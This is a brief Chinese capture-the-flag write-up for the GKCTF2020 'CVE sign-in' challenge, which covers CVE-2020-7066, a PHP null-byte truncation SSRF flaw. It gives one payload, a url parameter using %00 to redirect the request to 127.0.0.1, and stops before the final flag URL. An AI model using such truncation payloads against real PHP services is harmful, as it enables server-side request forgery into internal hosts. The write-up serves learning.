GKCTF2020 - CVE版签到
作者:互联网
CVE版签到
这道题主要考察的是cve-2020-7066,ssrf 漏洞
https://www.anquanke.com/vul/id/1966253
https://bugs.php.net/bug.php?id=79329
利用方法:
通过\0截断,访问本地主机,题目这里是使用%00截断
/?url=http://127.0.0.1%00www.ctfhub.com
提示以网址123结尾,构造的flag:
标签:php,签到,GKCTF2020,https,CVE,com,id 来源: https://www.cnblogs.com/echoDetected/p/12963626.html